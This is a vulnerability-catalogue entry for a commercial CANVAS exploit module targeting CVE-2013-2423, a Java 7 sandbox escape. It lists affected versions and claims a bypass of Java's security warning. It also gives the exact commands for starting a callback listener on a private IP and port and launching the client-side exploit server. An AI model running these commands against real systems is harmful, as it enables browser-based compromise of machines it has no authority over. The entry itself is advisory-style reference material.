Immunity Canvas: JAVA_DYNAMICBINDING

2013-04-17T18:55:00
ID JAVA_DYNAMICBINDING
Type canvas
Reporter Immunity Canvas
Modified 2013-04-17T18:55:00

Description

Name| java_DynamicBinding
---|---
CVE| CVE-2013-2423
Exploit Pack| CANVAS
Description| java_DynamicBinding
Notes| CVE Name: CVE-2013-2423
VENDOR: Sun
Notes:
A vulnerability in MethodHandle allows to overwrite public final fields.
This can be abused in order to disable Java Sandbox.

The current exploit also includes a Java Security Warning Bypass that works for Java 7 update 10 up to update 17

Affected versions
JDK and JRE 7 Update 17 and earlier

Tested on:
- Windows 7 with JDK/JRE 7 update 17 on Firefox, Chrome and IE

To run from command line, first start the listener (UNIVERSAL):
python commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17

And then run the exploit from clientd:
python ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_DynamicBinding -O allowed_recon_modules:js_recon -O auto_detect_exploits:0

Repeatability: Infinite (client side - no crash)
References: http://weblog.ikvm.net/PermaLink.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0
CVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2423
Date public: 04/17/2013